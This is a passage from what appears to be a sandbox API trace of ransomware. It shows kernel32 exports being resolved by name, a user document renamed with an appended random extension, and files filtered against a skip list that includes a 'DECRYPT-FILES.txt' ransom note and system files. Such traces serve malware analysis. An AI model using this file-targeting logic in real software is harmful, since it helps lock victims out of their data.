lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.518] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.518] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.518] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.518] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.518] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.518] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.518] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.518] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.518] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.519] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.519] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.519] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.519] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.519] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.519] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.519] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.519] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.519] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.519] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.519] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.519] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.519] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.519] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.519] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.519] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.519] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.519] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.519] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.519] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.520] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.520] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.520] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.520] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.520] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.520] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.520] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.520] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.520] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.520] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.520] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.520] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.520] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.520] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.520] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.520] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.520] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.520] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.520] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.521] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.521] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.521] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.521] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.521] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.521] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.521] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.521] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.521] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.521] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.521] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.521] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.521] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.521] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.521] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.521] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.521] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.521] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.521] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.521] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.522] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.522] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.522] lstrlenA (lpString="DELETEATOM") returned 10 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.522] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.522] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.522] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.522] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.522] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.522] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.522] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.522] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.522] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.522] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.522] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.522] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.522] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.522] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.522] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.522] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.522] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.523] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.523] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.523] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.523] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.523] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.523] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.523] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.523] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.523] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.523] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.523] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.523] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.523] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.523] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.523] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.523] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.523] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.523] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.523] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.524] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.524] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.524] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.524] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.524] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.524] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.524] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.524] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.524] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.524] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.524] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.524] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.524] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.524] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\8x_O2ZZ-dI_F.rtf") returned 100 [0084.524] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\8x_O2ZZ-dI_F.rtf.hF16Ea") returned 107 [0084.524] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\8x_O2ZZ-dI_F.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\8x_o2zz-di_f.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\8x_O2ZZ-dI_F.rtf.hF16Ea" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\8x_o2zz-di_f.rtf.hf16ea"), dwFlags=0x0) returned 1 [0084.525] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.525] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.525] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.525] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd229c70, ftCreationTime.dwHighDateTime=0x1d4c7e4, ftLastAccessTime.dwLowDateTime=0xce74d10, ftLastAccessTime.dwHighDateTime=0x1d4cf77, ftLastWriteTime.dwLowDateTime=0xce74d10, ftLastWriteTime.dwHighDateTime=0x1d4cf77, nFileSizeHigh=0x0, nFileSizeLow=0x6624, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aoe1mfCdGbGnQ.csv", cAlternateFileName="AOE1MF~1.CSV")) returned 1 [0084.525] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv", lpString2="DECRYPT-FILES.txt") returned -1 [0084.525] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv", lpString2="autorun.inf") returned -1 [0084.525] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv", lpString2="boot.ini") returned -1 [0084.525] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv", lpString2="desktop.ini") returned -1 [0084.525] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv", lpString2="ntuser.dat") returned -1 [0084.526] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv", lpString2="iconcache.db") returned -1 [0084.526] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv", lpString2="bootsect.bak") returned -1 [0084.526] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv", lpString2="ntuser.dat.log") returned -1 [0084.526] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv", lpString2="thumbs.db") returned -1 [0084.526] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv", lpString2="Bootfont.bin") returned -1 [0084.526] lstrlenW (lpString="Aoe1mfCdGbGnQ.csv") returned 17 [0084.526] lstrcmpiW (lpString1="csv", lpString2="lnk") returned -1 [0084.526] lstrcmpiW (lpString1="csv", lpString2="exe") returned -1 [0084.526] lstrcmpiW (lpString1="csv", lpString2="sys") returned -1 [0084.526] lstrcmpiW 